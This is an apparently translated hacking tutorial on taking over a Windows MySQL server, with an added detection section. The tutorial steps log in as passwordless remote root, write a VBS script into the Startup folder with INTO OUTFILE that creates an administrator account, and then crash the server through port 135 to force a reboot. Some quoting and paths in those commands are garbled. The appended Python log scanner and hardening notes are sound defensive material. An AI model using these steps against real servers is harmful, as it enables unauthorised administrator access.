MySQL attack
1. Connect to the remote MySQL server
mysql -u root -h 192.168.0.1
mysql.exe is in the bin directory of your MySQL installation.
2. Look at the databases on the server
Mysql>show databases;
A default MySQL installation has two databases, mysql and test; any other database you see was created by a user.
3. Enter a database
Mysql>use test;
We go into the test database.
4. See which tables the database contains
Mysql>show tables;
By default, test contains no tables.
The following steps are the key part.
5. Create a new table in the test database
Mysql>create Table A (cmd text);
We have created a new table named A with a single field, named cmd, of type text.
6. Insert the content into the table
Mysql>insert into a values ("Set Wshshell=createobject (" "Wscript.Shell") ");
Mysql>insert into a values ("A=wshshell.run (" "cmd.exe/c net User 1 1/add" ", 0)");
Mysql>insert into a values ("B=wshshell.run (" "Cmd.exe/c net localgroup Administrators 1/add" ", 0)");
Note that the double quotes, the parentheses and the trailing "0" must all be entered! These three statements will become the VBS script!
7. Now let's see what is in table A.
Mysql>select * from A;
We see three rows of data in the table, exactly what we just typed. Confirm that what you typed is correct, then go on to the next step.
8. Output the table as a VBS script file
Mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\" start "menu \ \ program \ Start \\a.vbs";
We have written the contents of our table into the Startup group as a VBS script file! Note the "\" symbols.
9. Having seen this, everyone will understand: we use MySQL to output an executable file. Why not a bat file? Because a bat file shows a visible DOS window when it runs at startup, while a VBS script can hide the window completely and shows no error prompts! Originally there should have been one more line so that the script deletes itself after it finishes, but the Chinese directory name really could not be handled, so it had to be left out! All right, find a tool to attack 135 and make the server reboot, and in a few minutes you'll be the administrator.
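
On the defending side, the file write in step 8 appears in the MySQL general query log as an INTO OUTFILE statement. The following Python code is an added example, not part of the original page, that flags such statements when the target is a script or executable, sits in an autostart directory, or uses an 8.3 short path like the one above. The log lines, the extension list and the path hints are constructed assumptions.

```python
import re

# File types Windows (or a web server) will execute if a query drops them on disk.
RISKY_EXT = {".vbs", ".vbe", ".js", ".wsf", ".hta", ".bat", ".cmd",
             ".ps1", ".exe", ".dll", ".php", ".asp", ".aspx", ".jsp"}
# Path fragments that indicate an autostart location (assumed hint list).
AUTOSTART_HINTS = ("startup", "start menu")

# SELECT ... INTO OUTFILE|DUMPFILE '<path>' with either quote style.
EXPORT_RE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s+(['\"])(.*?)\1",
                       re.IGNORECASE)

def normalize(path):
    """Undo SQL backslash doubling, unify separators, lowercase."""
    return path.replace("\\\\", "\\").replace("/", "\\").lower()

def inspect(line):
    """Return a finding dict for a suspicious file export, else None."""
    m = EXPORT_RE.search(line)
    if not m:
        return None
    path = normalize(m.group(2))
    name = path.rsplit("\\", 1)[-1]
    ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
    reasons = []
    if ext in RISKY_EXT:
        reasons.append("executable or script extension " + ext)
    if any(hint in path for hint in AUTOSTART_HINTS):
        reasons.append("autostart directory")
    if re.search(r"~\d", path):
        reasons.append("8.3 short name hides the real directory")
    return {"path": path, "reasons": reasons} if reasons else None

def scan(log_text):
    """Inspect every line of a general query log and collect findings."""
    return [f for f in map(inspect, log_text.splitlines()) if f]

# Constructed sample lines in general-query-log layout (not real data).
SAMPLE_LOG = r"""
2024-05-01T10:00:09Z 14 Query create table a (cmd text)
2024-05-01T10:00:30Z 14 Query select * from a into outfile "c:\\exampl~1\\startup\\a.vbs"
2024-05-01T10:02:00Z 21 Query SELECT id, total FROM orders INTO OUTFILE 'D:/exports/orders.csv'
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["path"], "->", "; ".join(finding["reasons"]))
```

The write only succeeds when the account holds the FILE privilege and `secure_file_priv` does not restrict export paths, so a passwordless remote root and an empty `secure_file_priv` are the settings to check first.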